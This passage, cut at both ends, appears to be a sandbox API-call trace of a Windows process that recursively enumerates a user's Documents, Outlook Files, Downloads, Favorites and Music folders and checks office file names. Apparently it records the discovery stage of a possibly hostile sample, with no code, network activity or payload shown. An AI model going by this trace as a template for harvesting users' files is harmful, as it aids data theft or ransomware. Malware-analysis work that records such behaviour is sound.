lpFindFileData=0x7228b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x982b7800, ftCreationTime.dwHighDateTime=0x1d5dbca, ftLastAccessTime.dwLowDateTime=0x801403a0, ftLastAccessTime.dwHighDateTime=0x1d5de21, ftLastWriteTime.dwLowDateTime=0x801403a0, ftLastWriteTime.dwHighDateTime=0x1d5de21, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4643627a, dwReserved1=0x4f372b77, cFileName="..", cAlternateFileName="")) returned 1 [0071.875] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.875] FindNextFileW (in: hFindFile=0x1412f48, lpFindFileData=0x7228b0 | out: lpFindFileData=0x7228b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77f71ec0, ftCreationTime.dwHighDateTime=0x1d5de33, ftLastAccessTime.dwLowDateTime=0xcb26cfd0, ftLastAccessTime.dwHighDateTime=0x1d5e515, ftLastWriteTime.dwLowDateTime=0xcb26cfd0, ftLastWriteTime.dwHighDateTime=0x1d5e515, nFileSizeHigh=0x0, nFileSizeLow=0x16a4c, dwReserved0=0x4643627a, dwReserved1=0x4f372b77, cFileName="LGY4pay4JvdTzyt.xls", cAlternateFileName="LGY4PA~1.XLS")) returned 1 [0071.875] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.875] lstrlenW (lpString="LGY4pay4JvdTzyt.xls") returned 19 [0071.875] FindClose (in: hFindFile=0x1412f48 | out: hFindFile=0x1412f48) returned 1 [0071.875] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7228b0 | out: hHeap=0x6d0000) returned 1 [0071.875] FindNextFileW (in: hFindFile=0x709230, lpFindFileData=0x722458 | out: lpFindFileData=0x722458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc9e3e0, ftCreationTime.dwHighDateTime=0x1d5e4a0, ftLastAccessTime.dwLowDateTime=0x247bac40, ftLastAccessTime.dwHighDateTime=0x1d5db02, ftLastWriteTime.dwLowDateTime=0x247bac40, ftLastWriteTime.dwHighDateTime=0x1d5db02, nFileSizeHigh=0x0, nFileSizeLow=0x54ef, dwReserved0=0x0, dwReserved1=0x0, cFileName="l3On-KdN.ppt", cAlternateFileName="")) returned 1 [0071.875] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.875] lstrlenW (lpString="l3On-KdN.ppt") returned 12 [0071.875] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.875] lstrlenW (lpString="O4e_5o.pptx") returned 11 [0071.875] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.875] lstrlenW (lpString="TisyakUT71347sh2r6.odp") returned 22 [0071.876] FindClose (in: hFindFile=0x709230 | out: hFindFile=0x709230) returned 1 [0071.876] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722458 | out: hHeap=0x6d0000) returned 1 [0071.876] FindNextFileW (in: hFindFile=0x71aba0, lpFindFileData=0x71a030 | out: lpFindFileData=0x71a030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3df8f0d0, ftCreationTime.dwHighDateTime=0x1d5e230, ftLastAccessTime.dwLowDateTime=0x9904dff0, ftLastAccessTime.dwHighDateTime=0x1d5e4fd, ftLastWriteTime.dwLowDateTime=0x9904dff0, ftLastWriteTime.dwHighDateTime=0x1d5e4fd, nFileSizeHigh=0x0, nFileSizeLow=0x205b, dwReserved0=0x0, dwReserved1=0x0, cFileName="JKuAschREk0B YjJ.odp", cAlternateFileName="JKUASC~1.ODP")) returned 1 [0071.876] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\UykkqOU3_Kh\\*", lpFindFileData=0x722458 | out: lpFindFileData=0x722458*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc958c6e0, ftCreationTime.dwHighDateTime=0x1d5e3b2, ftLastAccessTime.dwLowDateTime=0xe0939d10, ftLastAccessTime.dwHighDateTime=0x1d5decd, ftLastWriteTime.dwLowDateTime=0xe0939d10, ftLastWriteTime.dwHighDateTime=0x1d5decd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x722ab8 [0071.876] FindNextFileW (in: hFindFile=0x722ab8, lpFindFileData=0x722458 | out: lpFindFileData=0x722458*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc958c6e0, ftCreationTime.dwHighDateTime=0x1d5e3b2, ftLastAccessTime.dwLowDateTime=0xe0939d10, ftLastAccessTime.dwHighDateTime=0x1d5decd, ftLastWriteTime.dwLowDateTime=0xe0939d10, ftLastWriteTime.dwHighDateTime=0x1d5decd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.876] FindClose (in: hFindFile=0x722ab8 | out: hFindFile=0x722ab8) returned 1 [0071.876] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722458 | out: hHeap=0x6d0000) returned 1 [0071.876] FindNextFileW (in: hFindFile=0x71aba0, lpFindFileData=0x71a030 | out: lpFindFileData=0x71a030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x796e330, ftCreationTime.dwHighDateTime=0x1d5e7df, ftLastAccessTime.dwLowDateTime=0x216900, ftLastAccessTime.dwHighDateTime=0x1d5e61c, ftLastWriteTime.dwLowDateTime=0x216900, ftLastWriteTime.dwHighDateTime=0x1d5e61c, nFileSizeHigh=0x0, nFileSizeLow=0x918a, dwReserved0=0x0, dwReserved1=0x0, cFileName="zjmVUQHRRU40fBau_.xlsx", cAlternateFileName="ZJMVUQ~1.XLS")) returned 1 [0071.876] FindClose (in: hFindFile=0x71aba0 | out: hFindFile=0x71aba0) returned 1 [0071.876] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a030 | out: hHeap=0x6d0000) returned 1 [0071.876] FindNextFileW (in: hFindFile=0x7091f0, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xa0038c26, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0071.876] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x71a030 | out: lpFindFileData=0x71a030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71aba0 [0071.877] FindNextFileW (in: hFindFile=0x71aba0, lpFindFileData=0x71a030 | out: lpFindFileData=0x71a030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.877] FindClose (in: hFindFile=0x71aba0 | out: hFindFile=0x71aba0) returned 1 [0071.877] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a030 | out: hHeap=0x6d0000) returned 1 [0071.877] FindNextFileW (in: hFindFile=0x7091f0, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8472c810, ftCreationTime.dwHighDateTime=0x1d58dcb, ftLastAccessTime.dwLowDateTime=0x92981730, ftLastAccessTime.dwHighDateTime=0x1d586f8, ftLastWriteTime.dwLowDateTime=0x92981730, ftLastWriteTime.dwHighDateTime=0x1d586f8, nFileSizeHigh=0x0, nFileSizeLow=0xbbcc, dwReserved0=0xa0000003, dwReserved1=0xa0038c26, cFileName="Q1PA4eFObKqF.xlsx", cAlternateFileName="Q1PA4E~1.XLS")) returned 1 [0071.877] FindClose (in: hFindFile=0x7091f0 | out: hFindFile=0x7091f0) returned 1 [0071.877] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.877] FindNextFileW (in: hFindFile=0x70b890, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0071.877] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xa0038c26, cFileName=".", cAlternateFileName="")) returned 0x71aba0 [0071.878] FindNextFileW (in: hFindFile=0x71aba0, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xa0038c26, cFileName="..", cAlternateFileName="")) returned 1 [0071.878] FindClose (in: hFindFile=0x71aba0 | out: hFindFile=0x71aba0) returned 1 [0071.878] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.878] FindNextFileW (in: hFindFile=0x70b890, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0071.878] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xa0038c26, cFileName=".", cAlternateFileName="")) returned 0x71aba0 [0071.878] FindNextFileW (in: hFindFile=0x71aba0, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xa0038c26, cFileName="..", cAlternateFileName="")) returned 1 [0071.878] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x720718 | out: lpFindFileData=0x720718*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x722ab8 [0071.878] FindNextFileW (in: hFindFile=0x722ab8, lpFindFileData=0x720718 | out: lpFindFileData=0x720718*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.878] FindClose (in: hFindFile=0x722ab8 | out: hFindFile=0x722ab8) returned 1 [0071.879] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x720718 | out: hHeap=0x6d0000) returned 1 [0071.879] FindNextFileW (in: hFindFile=0x71aba0, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xa0038c26, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0071.879] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x720718 | out: lpFindFileData=0x720718*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x722ab8 [0071.906] FindNextFileW (in: hFindFile=0x722ab8, lpFindFileData=0x720718 | out: lpFindFileData=0x720718*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.906] FindClose (in: hFindFile=0x722ab8 | out: hFindFile=0x722ab8) returned 1 [0071.907] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x720718 | out: hHeap=0x6d0000) returned 1 [0071.907] FindNextFileW (in: hFindFile=0x71aba0, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xa0038c26, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0071.907] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x720718 | out: lpFindFileData=0x720718*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x722ab8 [0071.910] FindNextFileW (in: hFindFile=0x722ab8, lpFindFileData=0x720718 | out: lpFindFileData=0x720718*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.910] FindClose (in: hFindFile=0x722ab8 | out: hFindFile=0x722ab8) returned 1 [0071.911] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x720718 | out: hHeap=0x6d0000) returned 1 [0071.911] FindNextFileW (in: hFindFile=0x71aba0, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xa0038c26, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0071.911] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x720718 | out: lpFindFileData=0x720718*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x722ab8 [0071.920] FindNextFileW (in: hFindFile=0x722ab8, lpFindFileData=0x720718 | out: lpFindFileData=0x720718*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.920] FindClose (in: hFindFile=0x722ab8 | out: hFindFile=0x722ab8) returned 1 [0071.921] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x720718 | out: hHeap=0x6d0000) returned 1 [0071.921] FindNextFileW (in: hFindFile=0x71aba0, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xa0038c26, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0071.921] FindClose (in: hFindFile=0x71aba0 | out: hFindFile=0x71aba0) returned 1 [0071.921] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.921] FindNextFileW (in: hFindFile=0x70b890, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0071.921] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xa0038c26, cFileName=".", cAlternateFileName="")) returned 0x71aba0 [0071.921] FindNextFileW (in: hFindFile=0x71aba0, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xa0038c26, cFileName="..", cAlternateFileName="")) returned 1 [0071.921] FindClose (in: hFindFile=0x71aba0 | out: hFindFile=0x71aba0) returned 1 [0071.922] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.922] FindNextFileW (in: hFindFile=0x70b890, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0071.922] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x720718, ftCreationTime.dwLowDateTime=0x71bec0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0xa0038c26, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0071.922] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.922] FindNextFileW (in: hFindFile=0x70b890, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd905ad20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd905ad20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0071.922] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd905ad20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd905ad20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xa0038c26, cFileName=".", cAlternateFileName="")) returned 0x71aba0 [0071.922] FindNextFileW (in: hFindFile=0x71aba0, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd905ad20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd905ad20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xa0038c26, cFileName="..", cAlternateFileName="")) returned 1 [0071.922] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\*", lpFindFileData=0x721510 | out: lpFindFileData=0x721510*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44571bd0, ftCreationTime.dwHighDateTime=0x1d5e75a, ftLastAccessTime.dwLowDateTime=0x40359990, ftLastAccessTime.dwHighDateTime=0x1d5e260, ftLastWriteTime.dwLowDateTime=0x40359990, ftLastWriteTime.dwHighDateTime=0x1d5e260, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e0065, dwReserved1=0x720075, cFileName=".", cAlternateFileName="")) returned 0x71c050 [0071.923] FindNextFileW (in: hFindFile=0x71c050, lpFindFileData=0x721510 | out: lpFindFileData=0x721510*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44571bd0, ftCreationTime.dwHighDateTime=0x1d5e75a, ftLastAccessTime.dwLowDateTime=0x40359990, ftLastAccessTime.dwHighDateTime=0x1d5e260, ftLastWriteTime.dwLowDateTime=0x40359990, ftLastWriteTime.dwHighDateTime=0x1d5e260, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e0065, dwReserved1=0x720075, cFileName="..", cAlternateFileName="")) returned 1 [0071.923] FindClose (in: hFindFile=0x71c050 | out: hFindFile=0x71c050) returned 1 [0071.923] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721510 | out: hHeap=0x6d0000) returned 1 [0071.923] FindNextFileW (in: hFindFile=0x71aba0, lpFindFileData=0x1412050 | out: 